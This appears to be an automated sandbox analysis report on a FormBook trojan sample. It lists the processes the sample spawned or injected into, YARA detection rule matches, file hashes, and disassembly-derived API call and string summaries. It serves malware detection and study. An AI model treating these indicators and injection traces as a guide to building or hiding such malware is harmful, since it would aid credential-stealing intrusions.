                                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2275425308.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:3
                                                                                                                                                                            Start time:11:29:23
                                                                                                                                                                            Start date:27/09/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe"
                                                                                                                                                                            Imagebase:0x570000
                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3986013036.0000000002C50000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3986013036.0000000002C50000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:4
                                                                                                                                                                            Start time:11:29:25
                                                                                                                                                                            Start date:27/09/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\Robocopy.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Windows\SysWOW64\Robocopy.exe"
                                                                                                                                                                            Imagebase:0x9a0000
                                                                                                                                                                            File size:131'072 bytes
                                                                                                                                                                            MD5 hash:0A1AA3D138103ED9FB645F6B02E41A2F
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3984885805.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3984885805.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3985113849.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3985113849.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3986045977.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3986045977.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:6
                                                                                                                                                                            Start time:11:29:38
                                                                                                                                                                            Start date:27/09/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe"
                                                                                                                                                                            Imagebase:0x570000
                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:7
                                                                                                                                                                            Start time:11:29:50
                                                                                                                                                                            Start date:27/09/2024
                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                            Imagebase:0x7ff79f9e0000
                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:1.4%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:5%
                                                                                                                                                                              Signature Coverage:14.3%
                                                                                                                                                                              Total number of Nodes:119
                                                                                                                                                                              Total number of Limit Nodes:7

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 97 417e93-417ebc call 42fc03 100 417ec2-417ed0 call 430203 97->100 101 417ebe-417ec1 97->101 104 417ee0-417ef1 call 42e583 100->104 105 417ed2-417edd call 4304a3 100->105 110 417ef3-417f07 LdrLoadDll 104->110 111 417f0a-417f0d 104->111 105->104 110->111
                                                                                                                                                                              APIs
                                                                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417F05
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Load
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2234796835-0
                                                                                                                                                                              • Opcode ID: 090d4582f4cec9fa612a4f3a88d0b2eedc2089dfeff03fc0dfc7bf97e9e0bd52
                                                                                                                                                                              • Instruction ID: f3c9c9cd2de25c48b25da892f34988a046c9b3f6ef809f4064f1309a4d22e372
                                                                                                                                                                              • Opcode Fuzzy Hash: 090d4582f4cec9fa612a4f3a88d0b2eedc2089dfeff03fc0dfc7bf97e9e0bd52
                                                                                                                                                                              • Instruction Fuzzy Hash: 270152B5E0020DA7DF10DAE1DC52FDEB7B8AB14308F0041AAED0897240F634EB498755

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 118 42ce13-42ce4c call 404b43 call 42e073 NtClose
                                                                                                                                                                              APIs
                                                                                                                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CE47
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Close
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                                                              • Opcode ID: 1963737b460c6f63be527a23d1b75cdbbab3325c8c3d0d6fe0d3c6db62f6a83e
                                                                                                                                                                              • Instruction ID: 70958d688ee4830419c2275c035ac38a32e46af9d23104fbb137359aecbbf3fe
                                                                                                                                                                              • Opcode Fuzzy Hash: 1963737b460c6f63be527a23d1b75cdbbab3325c8c3d0d6fe0d3c6db62f6a83e
                                                                                                                                                                              • Instruction Fuzzy Hash: 52E08C36300614BBD620FA5ADC11FABB7ACEFC5715F40405AFB08A7282C6B5BA1187F5

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 134 30735c0-30735cc LdrInitializeThunk
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 467e976f46e37073f495828fbb8c46a225d948725581b2d38fed6297dcbcc567
                                                                                                                                                                              • Instruction ID: 4fb367fa3e6d522a34980a98d149cddb88a1beb4535a50ecc5817c63b3a8f904
                                                                                                                                                                              • Opcode Fuzzy Hash: 467e976f46e37073f495828fbb8c46a225d948725581b2d38fed6297dcbcc567
                                                                                                                                                                              • Instruction Fuzzy Hash: BF90023160650802E100B2588554746104687D0301FA5C411A082456CD87958A5165A2

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 132 3072b60-3072b6c LdrInitializeThunk
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: c2864eb0aa40ae442fafd955dad36e1b12e8194d0df41917ff58320859b5bae4
                                                                                                                                                                              • Instruction ID: a2e36d66a1929a559374efda2c289cd63c9344a5a9e14ef8da73e41d35bde325
                                                                                                                                                                              • Opcode Fuzzy Hash: c2864eb0aa40ae442fafd955dad36e1b12e8194d0df41917ff58320859b5bae4
                                                                                                                                                                              • Instruction Fuzzy Hash: CC900261203404035105B2588454656404B87E0301B95C021E1414594DC62589916125

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 133 3072df0-3072dfc LdrInitializeThunk
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 46e9ba65936f9c5d9cd069e5dceb3c0b7e65d0dc8f9c9eb1b28fd4e7869207c5
                                                                                                                                                                              • Instruction ID: 8a2d8998b189b61c1a792f2cc443a34c8f4efd984ae315557f11c2b3409fa906
                                                                                                                                                                              • Opcode Fuzzy Hash: 46e9ba65936f9c5d9cd069e5dceb3c0b7e65d0dc8f9c9eb1b28fd4e7869207c5
                                                                                                                                                                              • Instruction Fuzzy Hash: 5990023120240813E111B2588544747004A87D0341FD5C412A082455CD97568A52A121
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 25db1c85c054b69945d5d882fed943971243958d82deec4f0b68e3bdc322ec6e
                                                                                                                                                                              • Instruction ID: 3a732ad5c39c8629aa392827a2f30c9ac81812c6231d6a2a37b06dd117813c0c
                                                                                                                                                                              • Opcode Fuzzy Hash: 25db1c85c054b69945d5d882fed943971243958d82deec4f0b68e3bdc322ec6e
                                                                                                                                                                              • Instruction Fuzzy Hash: D7F1C471D0021AAFDB24DF94CC85AEEB7B5AF45304F14819EE408A7341DB746E85CF99

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 0 414755-414757 1 414759-41475b 0->1 2 4147c8 0->2 3 414701 1->3 4 41475d-414769 1->4 5 4147d6-4147da 2->5 6 4147ca-4147ce 2->6 8 414707-41472d call 4255c3 3->8 9 414702 call 404ab3 3->9 14 41476b-41476f 4->14 10 4147b3-4147b6 5->10 11 4147dc-4147e0 5->11 6->5 7 4147d0-4147d4 6->7 7->5 13 4147e1-4147f1 7->13 24 41474d-414753 8->24 25 41472f-41473e PostThreadMessageW 8->25 9->8 10->5 15 4147b8-4147bc 10->15 17 414771-414776 14->17 18 41478d-414793 14->18 15->5 19 4147be-4147c2 15->19 17->18 21 414778-41477d 17->21 18->14 22 414795-414798 18->22 19->5 23 4147c4 19->23 21->18 26 41477f-414786 21->26 23->2 25->24 27 414740-41474a 25->27 28 414799-41479c 26->28 29 414788-41478b 26->29 27->24 29->18 29->28
                                                                                                                                                                              APIs
                                                                                                                                                                              • PostThreadMessageW.USER32(40mEe3Hg,00000111,00000000,00000000), ref: 0041473A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                                              • String ID: 40mEe3Hg$40mEe3Hg
                                                                                                                                                                              • API String ID: 1836367815-3051319734

                                                                                                                                                                              APIs
                                                                                                                                                                              • PostThreadMessageW.USER32(40mEe3Hg,00000111,00000000,00000000), ref: 0041473A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                                              • String ID: 40mEe3Hg$40mEe3Hg
                                                                                                                                                                              • API String ID: 1836367815-3051319734

                                                                                                                                                                              APIs
                                                                                                                                                                              • PostThreadMessageW.USER32(40mEe3Hg,00000111,00000000,00000000), ref: 0041473A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                                              • String ID: 40mEe3Hg$40mEe3Hg
                                                                                                                                                                              • API String ID: 1836367815-3051319734

                                                                                                                                                                              APIs
                                                                                                                                                                              • PostThreadMessageW.USER32(40mEe3Hg,00000111,00000000,00000000), ref: 0041473A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                                              • String ID: 40mEe3Hg$40mEe3Hg
                                                                                                                                                                              • API String ID: 1836367815-3051319734

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 81 41467e-41472d call 417e93 call 404ab3 call 4255c3 89 41474d-414753 81->89 90 41472f-41473e PostThreadMessageW 81->90 90->89 91 414740-41474a 90->91 91->89
                                                                                                                                                                              APIs
                                                                                                                                                                              • PostThreadMessageW.USER32(40mEe3Hg,00000111,00000000,00000000), ref: 0041473A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                                              • String ID: 40mEe3Hg$40mEe3Hg
                                                                                                                                                                              • API String ID: 1836367815-3051319734

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 92 42d193-42d1d7 call 404b43 call 42e073 RtlFreeHeap
                                                                                                                                                                              APIs
                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042D1D2
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                              • String ID: kA
                                                                                                                                                                              • API String ID: 3298025750-1675843574

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 113 42d143-42d187 call 404b43 call 42e073 RtlAllocateHeap
                                                                                                                                                                              APIs
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,0041ECBE,?,?,00000000,?,0041ECBE,?,?,?), ref: 0042D182
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1279760036-0

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 123 42d1e3-42d21c call 404b43 call 42e073 ExitProcess
                                                                                                                                                                              APIs
                                                                                                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,80D8F95D,?,?,80D8F95D), ref: 0042D217
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 621844428-0

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 128 3072c0a-3072c0f 129 3072c11-3072c18 128->129 130 3072c1f-3072c26 LdrInitializeThunk 128->130
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                              • API String ID: 0-2160512332
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                              • API String ID: 0-3089669407
                                                                                                                                                                              Strings
                                                                                                                                                                              • Critical section debug info address, xrefs: 030A541F, 030A552E
                                                                                                                                                                              • double initialized or corrupted critical section, xrefs: 030A5508
                                                                                                                                                                              • Critical section address., xrefs: 030A5502
                                                                                                                                                                              • Critical section address, xrefs: 030A5425, 030A54BC, 030A5534
                                                                                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 030A54CE
                                                                                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 030A5543
                                                                                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 030A54E2
                                                                                                                                                                              • Thread identifier, xrefs: 030A553A
                                                                                                                                                                              • 8, xrefs: 030A52E3
                                                                                                                                                                              • undeleted critical section in freed memory, xrefs: 030A542B
                                                                                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 030A540A, 030A5496, 030A5519
                                                                                                                                                                              • corrupted critical section, xrefs: 030A54C2
                                                                                                                                                                              • Invalid debug info address of this critical section, xrefs: 030A54B6
                                                                                                                                                                              • Address of the debug info found in the active list., xrefs: 030A54AE, 030A54FA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                              • API String ID: 0-2368682639
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                                                                                                                              • API String ID: 0-360209818
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                                                                              • API String ID: 0-3591852110
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                                                                              • API String ID: 0-3197712848
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                                                                              • API String ID: 0-3532704233
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                                                                                              • API String ID: 0-1357697941
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
